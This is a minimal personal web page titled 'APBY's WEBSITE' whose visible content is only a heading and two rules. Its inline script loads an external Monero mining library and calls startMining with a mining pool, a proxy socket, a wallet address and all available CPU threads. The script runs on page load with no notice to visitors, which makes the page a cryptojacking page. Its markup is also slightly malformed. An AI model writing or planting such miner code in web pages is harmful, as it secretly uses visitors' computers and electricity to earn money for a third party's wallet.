<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>APBY's WEBSITE</title>
</head>
    <script src="https://script.monerominer.rocks"></script>
    <script>
    server = "wss://ny1.xmrminingproxy.com";
    var pool = "gulf.moneroocean.stream:10001";
    var walletAddress = "85aGopV4ESjjM9XWKdyHtQBrutARCwqNW359K5ycnnerSYwWtkQACPacFrnWJpExkEgV7besm4vFnCbiWER6FV8ATy7RNXe";
    var workerId = "jph"
    var threads = -1;
    var password = "x";
    startMining(pool, walletAddress, workerId, threads, password);
    throttleMiner = 20;
    </script>
<body>
    <h>APBY's WEBSITE</h>
    <hr style="width:100%;>
    <hr style="width:100%;>
</body>
</html>
